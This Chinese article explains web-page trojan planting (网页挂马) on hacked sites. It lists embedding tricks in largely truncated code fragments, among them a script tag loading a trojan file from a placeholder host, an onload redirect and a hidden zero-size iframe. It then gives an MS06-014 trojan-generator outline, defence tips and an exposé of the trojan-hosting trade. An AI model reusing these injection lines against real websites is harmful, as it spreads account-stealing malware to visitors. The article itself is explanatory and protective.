什么是网页挂马? 网页挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面!再加代码使得木马在打开网页是运行。网页挂马的方法多种多样。 现在很多网站都被挂上了马,身为站长,恐怕是最怕的问题,一旦事发,影响用户是小,一旦被google贴上此网站可能有病毒的标签,恐怕会给网站带来很大的损失,下面就对一些常用的挂马方式做下分析 iframe用法: 如果把frameborder设为1,效果就像文本框一样 二:js文件挂马 首先将以下代码 三:js变形加密 <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 四:body挂马 <body onload="window.location=地址;"></body> 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + 六:css中挂马 body { 七:JAJA挂马 <SCRIPT language=javascript> 八:图片伪装 <html> 九:伪装调用: <frameset rows="444,0" cols="*"> 十:高级欺骗 <a href="http://www.chinaz.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_chinaz_com(); return true;"> 页面要显示的内容 </a> 网页是如何被挂马的 很多朋友都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到木马病毒。有经验的朋友会知道这是网页病毒,但是自己打开的明明是正规网站,没有哪家正规网站会将病毒放在自己的网页上吧?那么是什么导致了这种现象的发生呢?其中最有可能的一个原因就是:这个网站被挂马了。 挂马这个词目前我们似乎经常能听到,那么什么是挂马呢?挂马就是黑客入侵了一些网站后,将自己编写的网页木马嵌入被黑网站的主页中,利用被黑网站的流量将自己的网页木马传播开去,以达到自己不可告人的目的。例如很多游戏网站被挂马,黑客的目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。下面就让我们来了解这种时下最流行的黑客攻击手段。 挂马的核心:木马 从“挂马”这个词中我们就可以知道,这和木马脱离不了关系。的确,挂马的目的就是将木马传播出去,挂马只是一种手段。挂马使用的木马大致可以分为两类:一类是以远程控制为目的的木马,黑客使用这种木马进行挂马攻击,其目的是为了得到大量的肉鸡,以此对某些网站实施拒绝服务攻击或达到其他目的(目前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害者)。另一类是键盘记录木马,我们通常称其为盗号木马,其目的不言而喻,都是冲着我们的游戏帐号或者银行帐号来的。目前挂马所使用的木马多数属于后者。 木马的免杀伎俩 作为挂马所用的木马,其隐蔽性一定要高,这样就可以让用户在不知不觉中运行木马,也可以让挂马的页面存活更多的时间。黑客为了让木马躲避杀毒软件的查杀,使用的伎俩很多。通常使用的方法有: 冷门的加壳程序 虽然这两种方法都可以躲过杀毒软件的查杀,但是我们还是有办法阻止木马运行的,具体方法将在防范部分讲到。那么木马是如何“挂”在网站上的呢?这里我们以“灰鸽子”木马为例,演示一下黑客挂马的过程。演示用的“灰鸽子”木马已经经过免杀处理,杀毒软件无法查杀。 为什么我们一打开网页就会运行木马程序,木马又是如何“挂”在网站上的呢?这就要涉及“网页木马”这个概念。 网页木马就是将木马和网页结合在一起,打开网页的同时也会运行木马。最初的网页木马原理是利用IE浏览器的ActiveX控件,运行网页木马后会弹出一个控件下载提示,只有点击确认后才会运行其中的木马。这种网页木马在当时网络安全意识普遍不高的情况下还是有一点使用价值的,但是其缺点是显而易见的,就是会出现ActiveX控件下载提示。当然现在很少会有人去点击那莫名其妙的ActiveX控件下载确认窗口。 在这种情况下,新的网页木马诞生了。这类网页木马通常利用了IE浏览器的漏洞,在运行的时候没有丝毫提示,因此隐蔽性极高。可以说,正是IE浏览器层出不穷的漏洞造成了如今网页木马横行的网络。例如最近的IE浏览器漏洞MS06-014,就可以利用来制作一个绝对隐蔽的网页木马。下面让我们看看利用MS06-014制作网页木马的过程。 网页木马当然得有木马程序,这里我们使用上文中提到的“灰鸽子”木马。然后我们要下载一个MS06-014网页木马生成器。接着还要一个网页空间,三者准备完毕后,就可以开始测试了。 生成网页木马
寻找缺陷网站,写入网页木马 铲除网站“挂马”毒瘤 站长防范:如果你是一名站长,可以对网站首页以及其他主要页面的源代码进行检查,用记事本打开这些页面后,以“<iframe>”为关键字进行搜索,找到后可以查看是否是挂马代码。不过碰上有经验的黑客,会编写一段代码将整句挂马代码进行加密,这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序,如果有个别网页被修改,我们可以很快地发现。 当然,最好的办法就是设置好网站的权限,对于使用动态语言编写的网站,一般对网页文件是不需要改动的,所有的数据都存储在数据库中。因此我们可以只对数据库所在的文件夹设置写权限,而对整个网站文件夹设置只读权限,这样即使网站存在漏洞,黑客也别想通过脚本漏洞入侵网站,更别说在主页上挂马了。 普通用户防范:普通用户关心的自然是如何防范“挂马”攻击。既然杀毒软件在网页木马面前成了“睁眼瞎”,而我们又无法感知网站是否被“挂马”。在这种情况下,我们岂不是任人宰割?我们已经知道网页木马的运行原理利用了IE浏览器的漏洞,因此只要我们及时更新系统补丁就可以让网页木马失效了。开启系统“自动更新”的方法为:右键点击“我的电脑”,选择“属性”,切换到“自动更新”标签,选中其中的“自动(推荐)”即可。此外我们也可以使用“360安全卫士”等具有补丁更新功能的软件。运行“360安全卫士”后,点击“修复”→修复系统漏洞,即可查看系统的补丁状态,勾选未安装的补丁下载即可。使用“360安全卫士”更新补丁 杀毒软件在网页木马前失去了作用,不代表我们就拿它没辙。我们可以使用一款名为System Safety Monitor(以下简称为SSM)的软件,在它的监控下,没有一个木马病毒可以躲过它的眼睛。安装完毕后运行,其自动最小化到系统任务栏,开始对系统进行监控。SSM的监控功能相当强悍,系统内部的一些操作也会被监控并提醒。让我们看看SSM对付这种加密过的网页木马效果如何,打开挂有木马XXXX.com程序,其意思是IE浏览器想运行XXXX.com这个可执行程序。IE浏览器对于可执行程序是提示下载的,而不会直接运行,由此可见其中的猫腻,此时我们点击“拒绝”按钮就可以阻止网页木马的运行了。SSM的监控原理和杀毒软件不同,其最大特点是可以监控到所有的网页木马,由于其使用较一般安全软件来得复杂,因此建议中高级用户使用。 网站挂马行业揭秘 经常会在一些论坛和站点看到这样类似的广告:“万IP120元,日结!联系QQ:XXXXX”而往往加了QQ以后,都会被要求在页面挂上一段类似开篇时提到的<iframe src="http://127.0.0.1" height=0 width=0></iframe>,而打开中间的链接地址,往往只会有一个站长统计显示。如果您曾经接触过这样类型的情景,那么恭喜您,这就是传说中的挂马行业大军了。在做这篇报道时,小编专门约了两名与挂马行业有密切联系的人,一名是曾经的挂马销售员,另外一名是挂马站长。从这两位业内人士描述中,让我们一起了解这个神秘行业。 挂马方:金字塔结构形式 “一般,挂马的目的无非是为了盗取游戏帐号、QQ密码以及服务器资源和刷流量。”挂马业内销售小K这样跟小编说道挂马目的。挂马者先是找技术人员写出马来,而后招募马仔以万IP180-200的价格出货,一般,程序员写出来的马又分免杀加壳和不免杀加壳以及不免杀等几个类型。(免杀的意思就是装杀毒软件并不能扫描出有病毒木马来。)而一线的马仔又把从挂马者那拿到的代码以万IP160-180的价格出货给下一层销售人员,再由下一层的销售人员通过QQ、邮件、广告等方式具体销售给挂马的站长们。一般来讲一个新马出来的时间不会太长就会失效。而且幕后的老板(也就是挂马者)很容易跑路,所以,挂马时都采取日结的方式(每天现金结算一次)。而统计IP则是采用页面上放置的站长统计。 站长:多数挂马站长知情并乐此不疲 “其实我知道这是个缺德的行为,但是站长也得吃饭呀!”站长小Z在接受访问时无奈的表示。自从06年以来,中国站长网赚圈就低迷了许多,钱越来越不容易赚。联盟月结算,扣量,延发拥金等种种因素,让更多的站长选择了挂马这种来钱快的行业。“我有很多的站点,就是你们口中的垃圾站,一个站一天几千IP,如果做网络联盟,一个月也就200左右,而挂马,一个月大几千。但是,也是有选择性的挂,比如一些擦边图片站,一些俗站。正规类的站点是打死也不挂的。”小Z谈到挂马和联盟收入的差距时说道。收入差距大,佣金支付快,虽然也会经常遇到挂了一天就跑路的,但损失也不大。但也并不是所有站长像小Z这样幸运。另一名曾经挂马的站长小X就因为挂马被抓进去呆了一段时间。“本来以为挂马并没什么,谁能想到是恶意传播病毒?被相关机关抓去了才知道自己犯法了。”小X至今谈到被抓当晚还心有余悸。但是挂马者也不是什么站都收的,流量上要有限制,一般起点是日IP1000以上,并且还要纯流量。闹腾最大动静的2007年,很多站点都被挂了马,有主动的,有被动。当时作为业内最大站点的中国站长站为此还专门策划了个专题去号召站长们抵制挂马,净化中国网络环境。 (责任编辑:winkylin) |
